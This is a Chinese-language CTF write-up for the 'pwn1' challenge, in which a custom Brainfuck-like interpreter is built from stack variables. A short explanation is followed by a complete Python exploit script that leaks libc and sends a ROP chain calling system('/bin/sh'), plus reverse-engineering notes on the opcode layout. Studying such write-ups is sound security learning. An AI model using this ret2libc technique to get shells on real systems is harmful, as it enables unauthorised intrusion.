| data | challenge | tags | |
|---|---|---|---|
2024-10-13 19:55 |
pwn1 |
|
所有变量都在栈上靠 jmp rax 来连接,导致逆向的看起来会比较烦人。逆完发现可以操控一个指向栈的指针递增、putchar 输出 和 getchar 读入,甚至还帮忙串在一起不用去构造循环了,因此要做的只是:
- 泄漏 libc
- 写 ROP 链
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# expBy : @eastXueLian
# Debug : ./exp.py debug ./pwn -t -b b+0xabcd
# Remote: ./exp.py remote ./pwn ip:port
from lianpwn import *
cli_script()
set_remote_libc("libc.so.6")
io: tube = gift.io
elf: ELF = gift.elf
libc: ELF = gift.libc
context.log_level = "info"
def send_code(leng, data):
ru(b"len> ")
sl(i2b(leng))
ru(b"code> ")
s(data)
payload = b"a" * 0x10
send_code(0x18, payload)
payload = p8(62) * 0x58 + p8(46)
for i in range(7):
payload += p8(62) + p8(46)
payload += p8(0)
send_code(len(payload), payload)
libc_base = u64_ex(rn(8)) - 0x21C87
lg("libc_base", libc_base)
pop_rdi_ret = libc_base + 0x000000000002164F
rop = flat(
[
pop_rdi_ret + 1,
pop_rdi_ret,
libc_base + next(libc.search(b"/bin/sh\x00")),
libc_base + libc.sym.system,
]
)
payload = p8(62) * (0x38 - 1)
for i in range(len(rop)):
payload += p8(62)
payload += p8(44)
send_code(len(payload), payload)
debugB()
s(rop)
ia()
"""
var_B8 = dword ptr -0B8h i
code_len = dword ptr -0B4h
var_B0 = qword ptr -0B0h buf + x (PC)
var_A8 = qword ptr -0A8h ptr_to_s
var_A0 = qword ptr -0A0h ano_s_buf
code_buf = qword ptr -98h code_buf
var_90 = qword ptr -90h strange_chunk
var_88 = qword ptr -88h code_buf
60 var_80 = qword ptr -80h E85 // tmp--
62 var_78 = qword ptr -78h EAF // tmp++
43 var_70 = qword ptr -70h ED8 // (*tmp)++
45 var_68 = qword ptr -68h F11 // (*tmp)--
46 var_60 = qword ptr -60h F4D // putchar(*tmp)
44 var_58 = qword ptr -58h F85 // getchar(*tmp)
91 var_50 = qword ptr -50h FB9 // strange jmp
93 var_48 = qword ptr -48h 1089 // strange jmp bak
0 var_40 = qword ptr -40h 10FA // free strange_chunk and return
1 var_38 = qword ptr -38h 10D6 // nop
s = byte ptr -30h
canary = qword ptr -8
"""